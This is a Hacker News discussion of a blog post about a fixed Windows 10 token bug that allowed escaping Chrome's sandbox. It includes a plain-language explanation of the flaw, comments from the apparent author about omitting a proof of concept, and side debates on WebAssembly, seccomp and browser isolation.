What a one line change did to the Chrome sandbox

ChrisSD · on April 23, 2020

> The Chromium sandbox on Windows has stood the test of time. It’s considered one of the better sandboxing mechanisms deployed at scale without requiring elevated privileges to function.

For anyone who is interested in the history, this type of Restricted Token & Job Object sandbox was, as far as I know, first used in MOICE (Microsoft Office Isolated Conversion Environment). This was created by Microsoft's Office Trustworthy Computing group to isolate the conversion of `.doc` to `.docx`. David LeBlanc blogged about it in 2007, with his "Practical Windows Sandboxing" series[0][1][2]. Of course a third party may have independently discovered the same techniques but kept it to themselves.

The state of the art has improved since then but the general principles are the same.

[0]: https://docs.microsoft.com/en-us/archive/blogs/david_leblanc...

[1]: https://docs.microsoft.com/en-us/archive/blogs/david_leblanc...

[2]: https://docs.microsoft.com/en-us/archive/blogs/david_leblanc...

bits_of_bytes · on April 23, 2020

I believe some chromium sandbox logic came from GreenBorder (https://en.m.wikipedia.org/wiki/GreenBorder) but I don't know the timeline of that or how GreenBorder sandboxing was implemented.

signal11 · on April 23, 2020

Are there any antivirus vendors which now use these techniques? I know there was a spat between a member of the Chrome team and antivirus vendors about the latter not using sandboxes.

CJefferson · on April 23, 2020

I wish so much there were good cross-operating system sandboxing techniques. So mamy problems in things like video decoders (which are hard to write fast and safe) would be cured if I could easily pop them in a box with an input and output stream.

This type of stuff is of course in browsers, and they are doing great work in this area, it is just a shame it is hard for the rest of us to use.

xiphias2 · on April 23, 2020

Webassembly looks like an upcoming standard for sandboxing efficient code on the server side as well. As it's well supported and it doesn't have a big startup runtime cost, it looks like it has a real chance of success right now (after many failed ones in the last 25 years).

londons_explore · on April 23, 2020

Webassembly has a substantial performance hit for code containing hand-written vector loops using specialized instructions.

Things like video encoders and decoders are much slower in webassembly.

xiphias2 · on April 23, 2020

SIMD support is being worked on as far as I know, and this is a problem where there is room for a lot of improvement in the future. Generally interfacing between programming languages and systems efficiently, without too much data conversion/memory management is a harder problem than adding more low level programming support.

snazz · on April 23, 2020

Yes, it looks like WASM SIMD has already shipped in V8. There are some impressive demos on this page: https://v8.dev/features/simd

londons_explore · on April 23, 2020

It's kinda lame that none of those demos even run at 60fps, let alone 120fps on mobile for a real smooth experience, with lots of performance headroom for more than a single feature at once...

throwaway483284 · on April 23, 2020

I don't think SIMD support will help here, a lot of encoder/decoder code base is hand written ASM.

roblabla · on April 23, 2020

There's no reason to think it won't help - the encoder/decoder code base could be written in WASM directly to ensure it uses the SIMD instructions, and those will hopefully map closely to the machine SIMD instructions.

Of course though, you're right that it'll still incur a performance penalty.

londons_explore · on April 23, 2020

Someone needs to make a dev environment where someone can write WASM and see realtime the generated assembly instructions, together with the number of cycles to execute.

That way, the developer can tweak the input to the compiler to get exactly the sequence of instructions they wanted.

They can also hand write the output assembly, and put a patch in to the compiler saying "this generated assembly is faster that what you generated, so please generate this in the next version".

tomrod · on April 23, 2020

Sounds like a good margin to focus on for a... Patent? What would IP in the spade be?

AgentME · on April 23, 2020

Wouldn't patenting a performance optimization just work to prevent all browsers from adopting it?

AnIdiotOnTheNet · on April 23, 2020

Personally I find that hard to believe until it gets some mechanism of actually being able to free memory back to the OS.

jfkebwjsbx · on April 23, 2020

Wasm is too slow, and it is not different from other techniques that compile to an IR.

It does not stop all kinds of issues, so it is not secure on its own either.

signal11 · on April 23, 2020

Could "fast" VMs be a solution? e.g. Firecracker. You get a fairly robust level of isolation that way and they're quick to start.

CJefferson · on April 23, 2020

VMs feel a bit heavy, even if they are fast. If i want to wrap multiple parts of a program I could end up spawning a dozen VMs...

PudgePacket · on April 23, 2020

Not sure how relevant it is but Deno will be sandboxed by default (no disk/net access). So you could pipe in video and it could pipe out the encoded/decoded version with no access to disk.

amluto · on April 23, 2020

This is one reason I much prefer Linux’s seccomp over Microsoft’s sandbox. Microsoft’s depends on everything having just the right access control so you can’t escape. Linux’s blocks the dangerous primitives entirely.

A seccomp-like mechanism on top of restricted tokens could be quite strong. The GPU process could be denied the ability to query or modify processes entirely. Similarly, it could be denied the ability to call CreateProcessAsUser at all.

philsnow · on April 23, 2020

I think an analogy is trying to get a complicated IAM permissions setup just right, where you have some resource policies with NotPrincipal, some usage policies with NotResource/NotAction, etc. It becomes really hard to think about and you often rely on assumptions about the shape/structure of IAM principals.

Or, you can slap a Service Control Policy on the whole account and then boom, nobody can do Whichever Bad Thing that you're worried about Today.

The former approach requires me to reload the entire graph of dependencies and assumptions into my head whenever I want to make a change or ask my mental model of it a question. The latter approach allows nearly-reflexive answers.

namibj · on April 23, 2020

This is very closely related to how seL4 [0] allows delegating (subsets of) a processes own capabilities. The difference would be that this Windows kernel code isn't formally verified to uphold it's security model to a level where send-only capabilities are proven data-diodes (i.e., the sel4_Send() syscall blocks (potentially indefinitely), and it's sel4_NBSend() silently drops the message if the receiver isn't already waiting) a success/failure indication), whereas seL4 comes with extensive proofs.

aledthemathguy · on April 23, 2020

Excuse my ignorance but does this makes Chrome the safest browser on Windows? Or do all Chromium-based browsers benefit from this sandboxed environment and google's security measures?

Thx

ocdtrekkie · on April 23, 2020

Edge would both have all the security work of Chrome (as it's a fairly close fork) but all of the security improvements that Google refuses to add, such as blocking third party tracking scripts and cookies. The latter part is where you're most likely to find malware, so a browser that refuses to act on it is not a secure browser. Firefox, Safari, Edge, and basically everyone but Chrome have implemented significant blocking on third party scripting that Google refuses to build into their browser.

Bear in mind, browser security comes from many levels. A sandbox escape first requires that someone has gotten malicious code to execute in your browser. And the first line of defense is blocking a lot of extraneous and harmful code from running in the first place.

jedimastert · on April 23, 2020

Can you talk abou wha kind of malware comes from JS scripts?

woodrowbarlow · on April 23, 2020

here is a detailed look at one particular example:

https://securelist.com/chrome-0-day-exploit-cve-2019-13720-u...

amenod · on April 23, 2020

Not necessarily. Firefox has its own set of protections and even introduced a new language (Rust) to deal with common security vulnerabilities without sacrifising speed.

But the takeaway from this post is more that perfect safety is difficult / impossible to achieve.

ta1771 · on April 23, 2020

Firefox runs multiple sites in a single process, its sandboxing doesn't come close.

cmeacham98 · on April 23, 2020

This hasn't been true for years (https://wiki.mozilla.org/Electrolysis)

sciurus · on April 23, 2020

Actually, it is still true. Electroloysis split up Firefox into multiple processes, but not every site gets its own process. Work is underway to change this and achieve full site isolation in https://wiki.mozilla.org/Project_Fission.

(Disclosure: I work for Mozilla, but not on this)

Drdrdrq · on April 23, 2020

Afaik, it uses Chromium's sandboxing?

That said, safety is about much more than just sandboxing.

snazz · on April 23, 2020

Assuming the "customizers" haven't messed up the sandbox, any Chromium-based browser is well-protected. You can visit chrome://sandbox to see which features are enabled. If you're talking about the new Edge, I think that includes the same sandboxing as regular Chrome.

floatingatoll · on April 23, 2020

This post does not offer evidence that could either support or contradict your question.

bri3d · on April 23, 2020

Using the cloned UI Access token to automate the Run dialog at the end of the exploit chain is hilarious.

I really enjoyed reading this - thank you.

quezzle · on April 23, 2020

Could someone tell me in Simple terms please?

KMag · on April 23, 2020

My understanding:

There are these security token objects that are used to keep track of what a process can and can't do. (Think of them as collections of capabilities.)

The design of the system is that you can create a less powerful child copy of your security token (dropping capabilities), and assign this token to a child process when you create that child. A process is free to change its security token to be any child of its current token or any sibling of its current token (plus a few other restrictions).

Someone screwed up a change to the Windows 10 kernel such that when the browser creates a restricted child of its token, the less powerful token is actually marked as a sibling of the browser's token, which is itself a sibling of many other tokens in the system. This means that the token the browser uses to create its child sandbox process has many unrestricted sibling tokens.

The rest of the exploit involves figuring out how to get a handle to a security tokens that a few other processes make publicly available (sounds very strange to me) and which aren't as restrictive as the security token used to create the sandbox process.

If the sandbox's token were (correctly) a child of the main browser process's token, then these other tokens found wouldn't be siblings of the sandbox's token, and the sandbox process couldn't switch to using these security tokens. However, because of the screwed up family tree of these tokens, the sandbox is free to switch to these other security tokens.

gundmc · on April 23, 2020

This was very clearly written, thank you.

hedora · on April 23, 2020

Windows has an incredibly complicated set of token based authentication mechanisms that Chrome relies on. They interact with each other in non-trivial ways and were introduced piecemeal over a few decades.

It is so complicated that even the people maintaining it don’t understand it, and they accidentally added a privilege escalation path.

The author uses that to use a Chrome sandbox bug to escape from the sandbox.

The real WTF is the complexity and obscurity of the security primitives being exported from the kernel. Arguably, all major operating systems have the same issue, and are getting worse over time — I doubt anyone understands all of the layers of privilege checking mechanisms that have been bolted on to Linux, Windows or Mac OS over the years.

Drdrdrq · on April 23, 2020

This. The problem is that it is fairly easy to add another layer of protection, but nearly impossible to remove or replace it later.

speedgoose · on April 23, 2020

From my understanding, someone at Microsoft changed a line of code related to some access control in windows and it broke some access controls. The author thinks the change was a mistake, perhaps code cleaning from a Microsoft employee.

Then it's a long detailed post about how you can exploit the bug, while missing some critical parts so you actually can't exploit it for real.

tiraniddo · on April 23, 2020

I'm not sure which critical parts I've left out unless you mean a full working POC? The fun is reimplementing :-)

speedgoose · on April 23, 2020

Well, thanks for not publishing a full working POC.

About the critical missing part, I was thinking about this :

> Let’s focus on escaping the GPU process sandbox. As I don’t have a GPU RCE to hand I’ll just inject a DLL into the process to run the escape.

From what I understand, a GPU RCE would allow escaping the sandbox from remote while injecting the DLL requires a good control on the machine. But your post was not about a GPU RCE so it totally makes sense to not do it. I may be very wrong because I am not a security expert, I only read MISC (a French magazine about security) on the beach.

tiraniddo · on April 23, 2020

Ah I see what you mean :-) We'll yes I left out the RCE as I'm not an RCE person, I look for sandbox escapes and privilege escalation bugs. The injection of a DLL is to test rather than as an exploit.

I was originally going to write about using the same bug in Firefox. The default content sandbox in FF is basically the same as Chrome GPU, so any untrusted HTML/JS coming from the web could exploit RCE to get into a sandboxed process where this bug could be used. I decided considering they're using the Chromium sandbox code it really should be about Chrome.

That said, this sandbox escape isn't being presented for practical reasons. It'd be incredibly noisy to do and potentially unreliable due to the various mitigations you have to circumvent. Any "real" attacker would likely use an exploit in the kernel's WIN32K component which is accessible from GPU.

ComodoHacker · on April 23, 2020

Has it been fixed in Firefox?

KMag · on April 23, 2020

The vulnerability is in Windows 10. Windows 10 has been fixed. It's not clear in the article what other mitigations are in place in Firefox to make exploitation more difficult.

tiraniddo · on April 23, 2020

Basically my PoC works exactly the same from Chrome GPU as FF Content Level 5 [1] there was no additional hardening. It was also easier to test as FF doesn't enable the Microsoft DLL signing mitigation should I could just do a direct CreateRemoteThread -> LoadLibrary without messing with KnownDlls.

[1] https://wiki.mozilla.org/Security/Sandbox

bits_of_bytes · on April 23, 2020

I've briefly professionally interacted with James and he's the real deal. Super smart.

HackerLemon · on April 23, 2020

Good article but James just sounds salty throughout the post

tiraniddo · on April 23, 2020

You can bet I'm salty. I do Windows research and I am a owner of the Chromium Windows sandbox code so I have a vested interest in this.

The problem with dealing with Windows and by extension Microsoft is there's no way of inspecting what they've changed from version to version other than by RE or having test cases. However, we try and avoid writing unit tests for behaviors Microsoft's responsible for, but of course in many cases MS don't have those tests either so these things fall through the cracks.

dataflow · on April 23, 2020

I have a question. With the sheer number of Windows components each having objects whose security and inheritability can be manipulated individually, and with tokens and privileges controlling access on top of that, and with so many users and groups to account for, and with so many special cases for consoles etc. to consider, I'm surprised at how few of these bugs there seem to be. It seems like a herculean feat to track everything for even just a single version of the kernel, let alone in an ever-evolving entire OS. Do you know how Microsoft keeps track of all the security barriers, interactions, etc. in the entire OS? Do they have entire teams dedicated to just tracking the security privileges/permissions/etc. for all the components?

amenod · on April 23, 2020

> However, we try and avoid writing unit tests for behaviors Microsoft's responsible for,...

When you say "unit tests", this makes sense. But wouldn't it be wise to have integration tests in place that would guard against such regressions, either in your code or Microsoft's?

tiraniddo · on April 23, 2020

In Chromium we do have integration tests for the sandbox functionality as a whole and unit testing but it doesn't cover things like this as we're testing Chromium's ability to sandbox not whether the OS's primitives have broken. We might notice if all of a sudden our sandbox stopped working, but for something which only exhibits a problem when it's being actively circumvented we won't.

I can't speak to what MS do testing wise, considering the age of some of this code it seems likely there's no test for this specific functionality otherwise you'd assume it would have been noticed. Testing for security defects is inherently difficult anyway, especially logical flaws where you don't get a nice crash. This case is different but in general you usually need some specific setup process to get the system into a vulnerable state which is hard to achieve without knowing ahead of time the bug you were trying to detect.

dataflow · on April 23, 2020

Does anyone else feel like if Windows was still a classic OS instead of "as a service" then these types of changes would have a chance to get more scrutiny during development and hopefully get caught?

hedora · on April 23, 2020

Since they supported multiple versions at once, important bugfixes were backported, but risky new features were not. For a year or so after each release, the previous release was more stable. This let the customer choose between security/stability and new features.

I think it’s a great model, but it breaks down when the new version is a feature/usability regression vs the old version.

Once that started happening more often than not, the “aas” models came out, where the vendors started force upgrading users instead of trying to compete with version N-1.

This is worse for the users, but better for deadline-focused middle management, so it’s become incredibly popular.

SahAssar · on April 23, 2020

Are you saying that these sort of changes were never part of a patch or service-pack before Win10?

dataflow · on April 23, 2020

Do you think it's sensible for me to make such a claim?

SahAssar · on April 23, 2020

No, but that's what it sounded like you were doing.

toyg · on April 23, 2020

Nah. It would have just taken longer to fix, imho.

buckminster · on April 23, 2020

This. Twenty years ago, if you reported a bug to MS and they agreed it was a bug and they agreed to fix it then you might actually have working code in three years time when the next version of Windows was released. Five years after that all of your customers might have upgraded to this new version of Windows. And then you could rely on the fix.

Important customers could get a hotfix. For anyone else reporting bugs was pointless.

ChrisSD · on April 23, 2020

In its consumer operating systems, MS used to not consider it a bug for a process to exploit other processes on the same machine. After all, why would you be running untrusted code?

I'd also add that Microsoft used to be notoriously bad at security, such that even Mac owners would make fun of them. We're still dealing with the design decisions made during that era. It's only since XP SP1 that security was taken more seriously and it wasn't until Vista that they truly started to grapple with the whole mess from the ground up.

ocdtrekkie · on April 23, 2020

> even Mac owners would make fun of them

Although, in reality, Mac owners really only were secure by way of being too few and far between to bother writing malware for.

Just this past year, Apple essentially implemented UAC into OS X.

jamesgeck0 · on April 23, 2020

Hasn't Mac software run with non-admin user permissions by default since the first version of OS X?